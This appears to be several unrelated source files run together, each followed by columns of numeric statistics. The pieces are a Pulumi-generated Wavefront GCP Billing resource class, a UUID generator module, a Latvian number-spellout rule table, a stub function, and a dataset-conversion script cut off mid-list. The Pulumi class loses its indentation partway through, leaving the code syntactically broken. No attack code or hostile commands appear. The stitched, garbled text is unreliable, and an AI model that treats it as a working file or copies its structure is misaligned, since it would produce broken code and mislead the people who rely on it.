__all__ = ['CloudIntegrationGcpBillingArgs', 'CloudIntegrationGcpBilling']
@pulumi.input_type
class CloudIntegrationGcpBillingArgs:
    # NOTE: this class is produced by the Pulumi Terraform Bridge (tfgen);
    # hand edits are normally overwritten on regeneration.
    def __init__(__self__, *,
                 api_key: pulumi.Input[str],
                 json_key: pulumi.Input[str],
                 project_id: pulumi.Input[str],
                 service: pulumi.Input[str],
                 additional_tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
                 force_save: Optional[pulumi.Input[bool]] = None,
                 name: Optional[pulumi.Input[str]] = None,
                 service_refresh_rate_in_minutes: Optional[pulumi.Input[int]] = None):
        """
        The set of arguments for constructing a CloudIntegrationGcpBilling resource.
        :param pulumi.Input[str] api_key: API key for Google Cloud Platform (GCP)
        :param pulumi.Input[str] json_key: Private key for a Google Cloud Platform (GCP) service account within your project.
               The account must be at least granted Monitoring Viewer permissions. This key must be in the JSON format generated by GCP.
        :param pulumi.Input[str] project_id: The Google Cloud Platform (GCP) Project Id
        :param pulumi.Input[str] service: A value denoting which cloud service this service integrates with
        :param pulumi.Input[Mapping[str, pulumi.Input[str]]] additional_tags: A list of point tag key-values to add to every point ingested using this integration
        :param pulumi.Input[bool] force_save: Forces this resource to save, even if errors are present
        :param pulumi.Input[str] name: The human-readable name of this integration
        :param pulumi.Input[int] service_refresh_rate_in_minutes: How often, in minutes, to refresh the service
        """
        # Required arguments are always stored.
        pulumi.set(__self__, "api_key", api_key)
        pulumi.set(__self__, "json_key", json_key)
        pulumi.set(__self__, "project_id", project_id)
        pulumi.set(__self__, "service", service)
        # Optional arguments are stored only when the caller supplied them.
        if additional_tags is not None:
            pulumi.set(__self__, "additional_tags", additional_tags)
        if force_save is not None:
            pulumi.set(__self__, "force_save", force_save)
        if name is not None:
            pulumi.set(__self__, "name", name)
        if service_refresh_rate_in_minutes is not None:
            pulumi.set(__self__, "service_refresh_rate_in_minutes", service_refresh_rate_in_minutes)

    @property
    @pulumi.getter(name="apiKey")
    def api_key(self) -> pulumi.Input[str]:
        """
        API key for Google Cloud Platform (GCP)
        """
        return pulumi.get(self, "api_key")

    @api_key.setter
    def api_key(self, value: pulumi.Input[str]):
        pulumi.set(self, "api_key", value)

    @property
    @pulumi.getter(name="jsonKey")
    def json_key(self) -> pulumi.Input[str]:
        """
        Private key for a Google Cloud Platform (GCP) service account within your project.
        The account must be at least granted Monitoring Viewer permissions. This key must be in the JSON format generated by GCP.
        """
        return pulumi.get(self, "json_key")

    @json_key.setter
    def json_key(self, value: pulumi.Input[str]):
        pulumi.set(self, "json_key", value)

    @property
    @pulumi.getter(name="projectId")
    def project_id(self) -> pulumi.Input[str]:
        """
        The Google Cloud Platform (GCP) Project Id
        """
        return pulumi.get(self, "project_id")

    @project_id.setter
    def project_id(self, value: pulumi.Input[str]):
        pulumi.set(self, "project_id", value)

    @property
    @pulumi.getter
    def service(self) -> pulumi.Input[str]:
        """
        A value denoting which cloud service this service integrates with
        """
        return pulumi.get(self, "service")

    @service.setter
    def service(self, value: pulumi.Input[str]):
        pulumi.set(self, "service", value)

    @property
    @pulumi.getter(name="additionalTags")
    def additional_tags(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
        """
        A list of point tag key-values to add to every point ingested using this integration
        """
        return pulumi.get(self, "additional_tags")

    @additional_tags.setter
    def additional_tags(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
        pulumi.set(self, "additional_tags", value)

    @property
    @pulumi.getter(name="forceSave")
    def force_save(self) -> Optional[pulumi.Input[bool]]:
        """
        Forces this resource to save, even if errors are present
        """
        return pulumi.get(self, "force_save")

    @force_save.setter
    def force_save(self, value: Optional[pulumi.Input[bool]]):
        pulumi.set(self, "force_save", value)

    @property
    @pulumi.getter
    def name(self) -> Optional[pulumi.Input[str]]:
        """
        The human-readable name of this integration
        """
        return pulumi.get(self, "name")

    @name.setter
    def name(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "name", value)

    @property
    @pulumi.getter(name="serviceRefreshRateInMinutes")
    def service_refresh_rate_in_minutes(self) -> Optional[pulumi.Input[int]]:
        """
        How often, in minutes, to refresh the service
        """
        return pulumi.get(self, "service_refresh_rate_in_minutes")

    @service_refresh_rate_in_minutes.setter
    def service_refresh_rate_in_minutes(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "service_refresh_rate_in_minutes", value)
@pulumi.input_type
class _CloudIntegrationGcpBillingState:
def __init__(__self__, *,
additional_tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
api_key: Optional[pulumi.Input[str]] = None,
force_save: Optional[pulumi.Input[bool]] = None,
json_key: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
project_id: Optional[pulumi.Input[str]] = None,
service: Optional[pulumi.Input[str]] = None,
service_refresh_rate_in_minutes: Optional[pulumi.Input[int]] = None):
"""
Input properties used for looking up and filtering CloudIntegrationGcpBilling resources.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] additional_tags: A list of point tag key-values to add to every point ingested using this integration
:param pulumi.Input[str] api_key: API key for Google Cloud Platform (GCP)
:param pulumi.Input[bool] force_save: Forces this resource to save, even if errors are present
:param pulumi.Input[str] json_key: Private key for a Google Cloud Platform (GCP) service account within your project.
The account must be at least granted Monitoring Viewer permissions. This key must be in the JSON format generated by GCP.
:param pulumi.Input[str] name: The human-readable name of this integration
:param pulumi.Input[str] project_id: The Google Cloud Platform (GCP) Project Id
:param pulumi.Input[str] service: A value denoting which cloud service this service integrates with
:param pulumi.Input[int] service_refresh_rate_in_minutes: How often, in minutes, to refresh the service
"""
if additional_tags is not None:
pulumi.set(__self__, "additional_tags", additional_tags)
if api_key is not None:
pulumi.set(__self__, "api_key", api_key)
if force_save is not None:
pulumi.set(__self__, "force_save", force_save)
if json_key is not None:
pulumi.set(__self__, "json_key", json_key)
if name is not None:
pulumi.set(__self__, "name", name)
if project_id is not None:
pulumi.set(__self__, "project_id", project_id)
if service is not None:
pulumi.set(__self__, "service", service)
if service_refresh_rate_in_minutes is not None:
pulumi.set(__self__, "service_refresh_rate_in_minutes", service_refresh_rate_in_minutes)
@property
@pulumi.getter(name="additionalTags")
def additional_tags(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
    """
    A list of point tag key-values to add to every point ingested using this integration
    """
    return pulumi.get(self, "additional_tags")

@additional_tags.setter
def additional_tags(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]) -> None:
    # Stores the value in Pulumi's property bag under the snake_case key;
    # the wire name "additionalTags" is handled by the getter decorator above.
    pulumi.set(self, "additional_tags", value)
@property
@pulumi.getter(name="apiKey")
def api_key(self) -> Optional[pulumi.Input[str]]:
    """
    API key for Google Cloud Platform (GCP)
    """
    return pulumi.get(self, "api_key")

@api_key.setter
def api_key(self, value: Optional[pulumi.Input[str]]) -> None:
    # Writes through to Pulumi's property bag (wire name "apiKey").
    pulumi.set(self, "api_key", value)
@property
@pulumi.getter(name="forceSave")
def force_save(self) -> Optional[pulumi.Input[bool]]:
    """
    Forces this resource to save, even if errors are present
    """
    return pulumi.get(self, "force_save")

@force_save.setter
def force_save(self, value: Optional[pulumi.Input[bool]]) -> None:
    # Writes through to Pulumi's property bag (wire name "forceSave").
    pulumi.set(self, "force_save", value)
@property
@pulumi.getter(name="jsonKey")
def json_key(self) -> Optional[pulumi.Input[str]]:
    """
    Private key for a Google Cloud Platform (GCP) service account within your project.
    The account must be at least granted Monitoring Viewer permissions. This key must be in the JSON format generated by GCP.
    """
    return pulumi.get(self, "json_key")

@json_key.setter
def json_key(self, value: Optional[pulumi.Input[str]]) -> None:
    # Writes through to Pulumi's property bag (wire name "jsonKey").
    pulumi.set(self, "json_key", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
    """
    The human-readable name of this integration
    """
    return pulumi.get(self, "name")

@name.setter
def name(self, value: Optional[pulumi.Input[str]]) -> None:
    # No wire-name override needed: the snake_case and camelCase forms coincide.
    pulumi.set(self, "name", value)
@property
@pulumi.getter(name="projectId")
def project_id(self) -> Optional[pulumi.Input[str]]:
    """
    The Google Cloud Platform (GCP) Project Id
    """
    return pulumi.get(self, "project_id")

@project_id.setter
def project_id(self, value: Optional[pulumi.Input[str]]) -> None:
    # Writes through to Pulumi's property bag (wire name "projectId").
    pulumi.set(self, "project_id", value)
@property
@pulumi.getter
def service(self) -> Optional[pulumi.Input[str]]:
    """
    A value denoting which cloud service this service integrates with
    """
    return pulumi.get(self, "service")

@service.setter
def service(self, value: Optional[pulumi.Input[str]]) -> None:
    # No wire-name override needed: the snake_case and camelCase forms coincide.
    pulumi.set(self, "service", value)
@property
@pulumi.getter(name="serviceRefreshRateInMinutes")
def service_refresh_rate_in_minutes(self) -> Optional[pulumi.Input[int]]:
    """
    How often, in minutes, to refresh the service
    """
    return pulumi.get(self, "service_refresh_rate_in_minutes")

@service_refresh_rate_in_minutes.setter
def service_refresh_rate_in_minutes(self, value: Optional[pulumi.Input[int]]) -> None:
    # Writes through to Pulumi's property bag (wire name "serviceRefreshRateInMinutes").
    pulumi.set(self, "service_refresh_rate_in_minutes", value)
class CloudIntegrationGcpBilling(pulumi.CustomResource):
    # NOTE(review): this class is provider-codegen output; keep hand edits to
    # documentation only so the file can be regenerated without conflicts.
    @overload
    def __init__(__self__,
                 resource_name: str,
                 opts: Optional[pulumi.ResourceOptions] = None,
                 additional_tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
                 api_key: Optional[pulumi.Input[str]] = None,
                 force_save: Optional[pulumi.Input[bool]] = None,
                 json_key: Optional[pulumi.Input[str]] = None,
                 name: Optional[pulumi.Input[str]] = None,
                 project_id: Optional[pulumi.Input[str]] = None,
                 service: Optional[pulumi.Input[str]] = None,
                 service_refresh_rate_in_minutes: Optional[pulumi.Input[int]] = None,
                 __props__=None):
        """
        Provides a Wavefront Cloud Integration for GCP Billing. This allows GCP Billing cloud integrations to be created,
        updated, and deleted.

        ## Example Usage

        ```python
        import pulumi
        import pulumi_wavefront as wavefront

        gcp_billing = wavefront.CloudIntegrationGcpBilling("gcpBilling",
            api_key="example-api-key",
            json_key=\"\"\"{...your gcp key ...}
        \"\"\",
            project_id="example-gcp-project")
        ```

        ## Import

        GCP Billing Cloud Integrations can be imported using the `id`, e.g.

        ```sh
         $ pulumi import wavefront:index/cloudIntegrationGcpBilling:CloudIntegrationGcpBilling gcp_billing a411c16b-3cf7-4f03-bf11-8ca05aab898d
        ```

        :param str resource_name: The name of the resource.
        :param pulumi.ResourceOptions opts: Options for the resource.
        :param pulumi.Input[Mapping[str, pulumi.Input[str]]] additional_tags: A list of point tag key-values to add to every point ingested using this integration
        :param pulumi.Input[str] api_key: API key for Google Cloud Platform (GCP)
        :param pulumi.Input[bool] force_save: Forces this resource to save, even if errors are present
        :param pulumi.Input[str] json_key: Private key for a Google Cloud Platform (GCP) service account within your project.
               The account must be at least granted Monitoring Viewer permissions. This key must be in the JSON format generated by GCP.
        :param pulumi.Input[str] name: The human-readable name of this integration
        :param pulumi.Input[str] project_id: The Google Cloud Platform (GCP) Project Id
        :param pulumi.Input[str] service: A value denoting which cloud service this service integrates with
        :param pulumi.Input[int] service_refresh_rate_in_minutes: How often, in minutes, to refresh the service
        """
        ...
    @overload
    def __init__(__self__,
                 resource_name: str,
                 args: CloudIntegrationGcpBillingArgs,
                 opts: Optional[pulumi.ResourceOptions] = None):
        """
        Provides a Wavefront Cloud Integration for GCP Billing. This allows GCP Billing cloud integrations to be created,
        updated, and deleted.

        ## Example Usage

        ```python
        import pulumi
        import pulumi_wavefront as wavefront

        gcp_billing = wavefront.CloudIntegrationGcpBilling("gcpBilling",
            api_key="example-api-key",
            json_key=\"\"\"{...your gcp key ...}
        \"\"\",
            project_id="example-gcp-project")
        ```

        ## Import

        GCP Billing Cloud Integrations can be imported using the `id`, e.g.

        ```sh
         $ pulumi import wavefront:index/cloudIntegrationGcpBilling:CloudIntegrationGcpBilling gcp_billing a411c16b-3cf7-4f03-bf11-8ca05aab898d
        ```

        :param str resource_name: The name of the resource.
        :param CloudIntegrationGcpBillingArgs args: The arguments to use to populate this resource's properties.
        :param pulumi.ResourceOptions opts: Options for the resource.
        """
        ...
    def __init__(__self__, resource_name: str, *args, **kwargs):
        # Runtime dispatcher for the two overloads above: accept either a single
        # CloudIntegrationGcpBillingArgs object or individual keyword arguments,
        # then funnel both forms into _internal_init.
        resource_args, opts = _utilities.get_resource_args_opts(CloudIntegrationGcpBillingArgs, pulumi.ResourceOptions, *args, **kwargs)
        if resource_args is not None:
            __self__._internal_init(resource_name, opts, **resource_args.__dict__)
        else:
            __self__._internal_init(resource_name, *args, **kwargs)

    def _internal_init(__self__,
                 resource_name: str,
                 opts: Optional[pulumi.ResourceOptions] = None,
                 additional_tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
                 api_key: Optional[pulumi.Input[str]] = None,
                 force_save: Optional[pulumi.Input[bool]] = None,
                 json_key: Optional[pulumi.Input[str]] = None,
                 name: Optional[pulumi.Input[str]] = None,
                 project_id: Optional[pulumi.Input[str]] = None,
                 service: Optional[pulumi.Input[str]] = None,
                 service_refresh_rate_in_minutes: Optional[pulumi.Input[int]] = None,
                 __props__=None):
        # Normalize/validate the resource options before registering the resource.
        if opts is None:
            opts = pulumi.ResourceOptions()
        if not isinstance(opts, pulumi.ResourceOptions):
            raise TypeError('Expected resource options to be a ResourceOptions instance')
        if opts.version is None:
            opts.version = _utilities.get_version()
        if opts.id is None:
            # Creating a new resource (as opposed to a .get() lookup):
            # callers must not pass a pre-built __props__ bag in this path.
            if __props__ is not None:
                raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
            __props__ = CloudIntegrationGcpBillingArgs.__new__(CloudIntegrationGcpBillingArgs)

            __props__.__dict__["additional_tags"] = additional_tags
            # api_key, json_key, project_id and service are required unless the
            # engine is rehydrating an existing resource (opts.urn is set).
            if api_key is None and not opts.urn:
                raise TypeError("Missing required property 'api_key'")
            __props__.__dict__["api_key"] = api_key
            __props__.__dict__["force_save"] = force_save
            if json_key is None and not opts.urn:
                raise TypeError("Missing required property 'json_key'")
            __props__.__dict__["json_key"] = json_key
            __props__.__dict__["name"] = name
            if project_id is None and not opts.urn:
                raise TypeError("Missing required property 'project_id'")
            __props__.__dict__["project_id"] = project_id
            if service is None and not opts.urn:
                raise TypeError("Missing required property 'service'")
            __props__.__dict__["service"] = service
            __props__.__dict__["service_refresh_rate_in_minutes"] = service_refresh_rate_in_minutes
        super(CloudIntegrationGcpBilling, __self__).__init__(
            'wavefront:index/cloudIntegrationGcpBilling:CloudIntegrationGcpBilling',
            resource_name,
            __props__,
            opts)

    @staticmethod
    def get(resource_name: str,
            id: pulumi.Input[str],
            opts: Optional[pulumi.ResourceOptions] = None,
            additional_tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
            api_key: Optional[pulumi.Input[str]] = None,
            force_save: Optional[pulumi.Input[bool]] = None,
            json_key: Optional[pulumi.Input[str]] = None,
            name: Optional[pulumi.Input[str]] = None,
            project_id: Optional[pulumi.Input[str]] = None,
            service: Optional[pulumi.Input[str]] = None,
            service_refresh_rate_in_minutes: Optional[pulumi.Input[int]] = None) -> 'CloudIntegrationGcpBilling':
        """
        Get an existing CloudIntegrationGcpBilling resource's state with the given name, id, and optional extra
        properties used to qualify the lookup.

        :param str resource_name: The unique name of the resulting resource.
        :param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
        :param pulumi.ResourceOptions opts: Options for the resource.
        :param pulumi.Input[Mapping[str, pulumi.Input[str]]] additional_tags: A list of point tag key-values to add to every point ingested using this integration
        :param pulumi.Input[str] api_key: API key for Google Cloud Platform (GCP)
        :param pulumi.Input[bool] force_save: Forces this resource to save, even if errors are present
        :param pulumi.Input[str] json_key: Private key for a Google Cloud Platform (GCP) service account within your project.
               The account must be at least granted Monitoring Viewer permissions. This key must be in the JSON format generated by GCP.
        :param pulumi.Input[str] name: The human-readable name of this integration
        :param pulumi.Input[str] project_id: The Google Cloud Platform (GCP) Project Id
        :param pulumi.Input[str] service: A value denoting which cloud service this service integrates with
        :param pulumi.Input[int] service_refresh_rate_in_minutes: How often, in minutes, to refresh the service
        """
        # Attach the provider id to opts so the engine performs a lookup rather
        # than a create, then seed the state bag with any caller-supplied values.
        opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))

        __props__ = _CloudIntegrationGcpBillingState.__new__(_CloudIntegrationGcpBillingState)

        __props__.__dict__["additional_tags"] = additional_tags
        __props__.__dict__["api_key"] = api_key
        __props__.__dict__["force_save"] = force_save
        __props__.__dict__["json_key"] = json_key
        __props__.__dict__["name"] = name
        __props__.__dict__["project_id"] = project_id
        __props__.__dict__["service"] = service
        __props__.__dict__["service_refresh_rate_in_minutes"] = service_refresh_rate_in_minutes
        return CloudIntegrationGcpBilling(resource_name, opts=opts, __props__=__props__)

    @property
    @pulumi.getter(name="additionalTags")
    def additional_tags(self) -> pulumi.Output[Optional[Mapping[str, str]]]:
        """
        A list of point tag key-values to add to every point ingested using this integration
        """
        return pulumi.get(self, "additional_tags")

    @property
    @pulumi.getter(name="apiKey")
    def api_key(self) -> pulumi.Output[str]:
        """
        API key for Google Cloud Platform (GCP)
        """
        return pulumi.get(self, "api_key")

    @property
    @pulumi.getter(name="forceSave")
    def force_save(self) -> pulumi.Output[Optional[bool]]:
        """
        Forces this resource to save, even if errors are present
        """
        return pulumi.get(self, "force_save")

    @property
    @pulumi.getter(name="jsonKey")
    def json_key(self) -> pulumi.Output[str]:
        """
        Private key for a Google Cloud Platform (GCP) service account within your project.
        The account must be at least granted Monitoring Viewer permissions. This key must be in the JSON format generated by GCP.
        """
        return pulumi.get(self, "json_key")

    @property
    @pulumi.getter
    def name(self) -> pulumi.Output[str]:
        """
        The human-readable name of this integration
        """
        return pulumi.get(self, "name")

    @property
    @pulumi.getter(name="projectId")
    def project_id(self) -> pulumi.Output[str]:
        """
        The Google Cloud Platform (GCP) Project Id
        """
        return pulumi.get(self, "project_id")

    @property
    @pulumi.getter
    def service(self) -> pulumi.Output[str]:
        """
        A value denoting which cloud service this service integrates with
        """
        return pulumi.get(self, "service")

    @property
    @pulumi.getter(name="serviceRefreshRateInMinutes")
    def service_refresh_rate_in_minutes(self) -> pulumi.Output[Optional[int]]:
        """
        How often, in minutes, to refresh the service
        """
        return pulumi.get(self, "service_refresh_rate_in_minutes")
| 44.065543
| 162
| 0.653393
| 2,852
| 23,531
| 5.169705
| 0.070827
| 0.090274
| 0.075963
| 0.04924
| 0.864623
| 0.848142
| 0.835052
| 0.810092
| 0.802835
| 0.793136
| 0
| 0.002092
| 0.248353
| 23,531
| 533
| 163
| 44.148218
| 0.831515
| 0.329905
| 0
| 0.726962
| 1
| 0
| 0.103565
| 0.035376
| 0
| 0
| 0
| 0
| 0
| 1
| 0.16041
| false
| 0.003413
| 0.017065
| 0
| 0.273038
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
c5adec84caad83e591889aed74bb615e91728c5a
| 369
|
py
|
Python
|
clean/utils/unique.py
|
bahnlink/pyclean
|
558d75341082472606788e088809831f6ea543c0
|
[
"MIT"
] | null | null | null |
clean/utils/unique.py
|
bahnlink/pyclean
|
558d75341082472606788e088809831f6ea543c0
|
[
"MIT"
] | 2
|
2021-03-25T21:49:39.000Z
|
2021-06-01T22:12:00.000Z
|
clean/utils/unique.py
|
bahnlink/pyclean
|
558d75341082472606788e088809831f6ea543c0
|
[
"MIT"
] | 1
|
2018-06-07T17:31:56.000Z
|
2018-06-07T17:31:56.000Z
|
import uuid
import shortuuid
class UniqueGenerator:
    """Interface for generators that emit unique string identifiers."""

    @staticmethod
    def generate() -> str:
        """Produce a unique identifier; concrete subclasses must override this."""
        raise NotImplementedError


class UUIDGenerator(UniqueGenerator):
    """Emits canonical 36-character UUID4 strings."""

    @staticmethod
    def generate() -> str:
        fresh = uuid.uuid4()
        return str(fresh)


class ShortUUIDGenerator(UniqueGenerator):
    """Emits compact identifiers via the third-party ``shortuuid`` library."""

    @staticmethod
    def generate() -> str:
        return shortuuid.uuid()
| 15.375
| 42
| 0.682927
| 32
| 369
| 7.875
| 0.46875
| 0.321429
| 0.357143
| 0.452381
| 0.325397
| 0
| 0
| 0
| 0
| 0
| 0
| 0.003534
| 0.233062
| 369
| 23
| 43
| 16.043478
| 0.886926
| 0
| 0
| 0.357143
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.214286
| true
| 0
| 0.142857
| 0.142857
| 0.714286
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 1
| 1
| 0
|
0
| 8
|
a839aa9842344290eb2d1e9b4ac059cc4477ba14
| 3,023
|
py
|
Python
|
dateparser/data/numeral_translation_data/lv.py
|
bazingarj/dateparser
|
48c4563fb7f6ce685fbd6d27e9e83257521d2203
|
[
"BSD-3-Clause"
] | 8
|
2019-11-15T21:00:15.000Z
|
2021-12-21T22:09:42.000Z
|
dateparser/data/numeral_translation_data/lv.py
|
bazingarj/dateparser
|
48c4563fb7f6ce685fbd6d27e9e83257521d2203
|
[
"BSD-3-Clause"
] | 9
|
2020-06-05T21:28:57.000Z
|
2022-02-12T12:30:39.000Z
|
dateparser/data/numeral_translation_data/lv.py
|
bazingarj/dateparser
|
48c4563fb7f6ce685fbd6d27e9e83257521d2203
|
[
"BSD-3-Clause"
] | 21
|
2019-03-11T04:25:23.000Z
|
2022-02-03T08:54:33.000Z
|
# -*- coding: utf-8 -*-
# ICU RBNF (rule-based number format) spellout rules for Latvian ("lv").
# Rule values use ICU RBNF syntax: "<"/">" recurse into another rule set for
# the quotient/remainder, "[ >>]" is an optional remainder suffix, and
# "=...=" substitutes a named rule set verbatim.
# NOTE(review): this table appears machine-exported from CLDR data — avoid
# hand-editing individual rules without checking the upstream source.
info = {
    # Internal helper set: bare digit stems used to build tens/hundreds/etc.
    # (only defined for 1-9; anything else is an ERROR sentinel).
    "%%spellout-prefixed": {
        "0": "ERROR;",
        "1": "vien;",
        "2": "div;",
        "3": "trīs;",
        "4": "četr;",
        "5": "piec;",
        "6": "seš;",
        "7": "septiņ;",
        "8": "astoņ;",
        "9": "deviņ;",
        "(10, 'inf')": "ERROR;"
    },
    # Feminine cardinal forms; defers to the masculine set for 10-19 and for
    # the multiplier part of large numbers.
    "%spellout-cardinal-feminine": {
        "0": "nulle;",
        "1": "viena;",
        "2": "divas;",
        "3": "trīs;",
        "4": "četras;",
        "5": "piecas;",
        "6": "sešas;",
        "7": "septiņas;",
        "8": "astoņas;",
        "9": "deviņas;",
        "(10, 19)": "=%spellout-cardinal-masculine=;",
        "(20, 99)": "<%%spellout-prefixed<desmit[ >>];",
        "(100, 199)": "simt[ >>];",
        "(200, 999)": "<%%spellout-prefixed<simt[ >>];",
        "(1000, 1999)": "tūkstoš[ >>];",
        "(2000, 999999)": "<%%spellout-prefixed<tūkstoš[ >>];",
        "(1000000, 1999999)": "viens miljons[ >>];",
        "(2000000, 999999999)": "<%spellout-cardinal-masculine< miljoni[ >>];",
        "(1000000000, 1999999999)": "viens miljards[ >>];",
        "(2000000000, 999999999999)": "<%spellout-cardinal-masculine< miljardi[ >>];",
        "(1000000000000, 1999999999999)": "viens biljons[ >>];",
        "(2000000000000, 999999999999999)": "<%spellout-cardinal-masculine< biljoni[ >>];",
        "(1000000000000000, 1999999999999999)": "viens biljards[ >>];",
        "(2000000000000000, 999999999999999999)": "<%spellout-cardinal-masculine< biljardi[ >>];",
        "(1000000000000000000, 'inf')": "=#,##0=;"
    },
    # Masculine cardinal forms; also the default via %spellout-numbering below.
    "%spellout-cardinal-masculine": {
        "0": "nulle;",
        "1": "viens;",
        "2": "divi;",
        "3": "trīs;",
        "4": "četri;",
        "5": "pieci;",
        "6": "seši;",
        "7": "septiņi;",
        "8": "astoņi;",
        "9": "deviņi;",
        "10": "desmit;",
        "(11, 19)": ">%%spellout-prefixed>padsmit;",
        "(20, 99)": "<%%spellout-prefixed<desmit[ >>];",
        "(100, 199)": "simt[ >>];",
        "(200, 999)": "<%%spellout-prefixed<simt[ >>];",
        "(1000, 1999)": "tūkstoš[ >>];",
        "(2000, 999999)": "<%%spellout-prefixed<tūkstoš[ >>];",
        "(1000000, 1999999)": "viens miljons[ >>];",
        "(2000000, 999999999)": "<%spellout-cardinal-masculine< miljoni[ >>];",
        "(1000000000, 1999999999)": "viens miljards[ >>];",
        "(2000000000, 999999999999)": "<%spellout-cardinal-masculine< miljardi[ >>];",
        "(1000000000000, 1999999999999)": "viens biljons[ >>];",
        "(2000000000000, 999999999999999)": "<%spellout-cardinal-masculine< biljoni[ >>];",
        "(1000000000000000, 1999999999999999)": "viens biljards[ >>];",
        "(2000000000000000, 999999999999999999)": "<%spellout-cardinal-masculine< biljardi[ >>];",
        "(1000000000000000000, 'inf')": "=#,##0=;"
    },
    # General numbering and year numbering both alias the masculine cardinals.
    "%spellout-numbering": {
        "(0, 'inf')": "=%spellout-cardinal-masculine=;"
    },
    "%spellout-numbering-year": {
        "(0, 'inf')": "=%spellout-numbering=;"
    }
}
| 39.25974
| 98
| 0.474032
| 229
| 3,023
| 6.257642
| 0.393013
| 0.133985
| 0.191905
| 0.027913
| 0.71598
| 0.71598
| 0.71598
| 0.71598
| 0.71598
| 0.71598
| 0
| 0.239198
| 0.25736
| 3,023
| 77
| 99
| 39.25974
| 0.399109
| 0.006947
| 0
| 0.434211
| 0
| 0
| 0.628457
| 0.213262
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 1
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
a859323fd81f195b482800ac1c0765c58ea04512
| 38
|
py
|
Python
|
tests/py_tests/test_faint/paths.py
|
lukas-ke/faint-graphics-editor
|
33eb9e6a3f2216fb2cf6ef9709a14f3d20b78fbf
|
[
"Apache-2.0"
] | 10
|
2016-12-28T22:06:31.000Z
|
2021-05-24T13:42:30.000Z
|
tests/py_tests/test_faint/paths.py
|
lukas-ke/faint-graphics-editor
|
33eb9e6a3f2216fb2cf6ef9709a14f3d20b78fbf
|
[
"Apache-2.0"
] | 4
|
2015-10-09T23:55:10.000Z
|
2020-04-04T08:09:22.000Z
|
tests/py_tests/test_faint/paths.py
|
lukas-ke/faint-graphics-editor
|
33eb9e6a3f2216fb2cf6ef9709a14f3d20b78fbf
|
[
"Apache-2.0"
] | null | null | null |
def get_test_out_path():
    """Placeholder for the test-output directory lookup; currently yields None."""
    return None
| 12.666667
| 25
| 0.684211
| 6
| 38
| 3.833333
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.236842
| 38
| 2
| 26
| 19
| 0.793103
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| true
| 0
| 0
| 0.5
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 1
| 1
| 0
|
0
| 7
|
a86d6b6f0079e5d4a0d096ee6f48b2fc4b60e24f
| 20,255
|
py
|
Python
|
datasets/convert_vis_val1.py
|
deeplearning-wisc/stud
|
b667a369e368181ef6e913c32f26e574bead9b56
|
[
"Apache-2.0"
] | 22
|
2022-03-09T03:13:10.000Z
|
2022-03-31T02:45:50.000Z
|
datasets/convert_vis_val1.py
|
deeplearning-wisc/stud
|
b667a369e368181ef6e913c32f26e574bead9b56
|
[
"Apache-2.0"
] | 1
|
2022-03-22T12:27:38.000Z
|
2022-03-22T22:45:46.000Z
|
datasets/convert_vis_val1.py
|
deeplearning-wisc/stud
|
b667a369e368181ef6e913c32f26e574bead9b56
|
[
"Apache-2.0"
] | 2
|
2022-03-21T02:32:53.000Z
|
2022-03-22T18:43:52.000Z
|
import json
import numpy as np
video = json.load(open('/nobackup-slow/dataset/my_xfdu/video/vis/train/instances.json'))
all_video_id = list(range(1, len(video['videos']) + 1))
num_train_video = int(len(all_video_id) * 0.8)
all_categories = [{'supercategory': 'object', 'id': 1, 'name': 'airplane'}, {'supercategory': 'object', 'id': 2, 'name': 'bear'},
{'supercategory': 'object', 'id': 3, 'name': 'bird'}, {'supercategory': 'object', 'id': 4, 'name': 'boat'},
{'supercategory': 'object', 'id': 5, 'name': 'car'}, {'supercategory': 'object', 'id': 6, 'name': 'cat'},
{'supercategory': 'object', 'id': 7, 'name': 'cow'}, {'supercategory': 'object', 'id': 8, 'name': 'deer'},
{'supercategory': 'object', 'id': 9, 'name': 'dog'}, {'supercategory': 'object', 'id': 10, 'name': 'duck'},
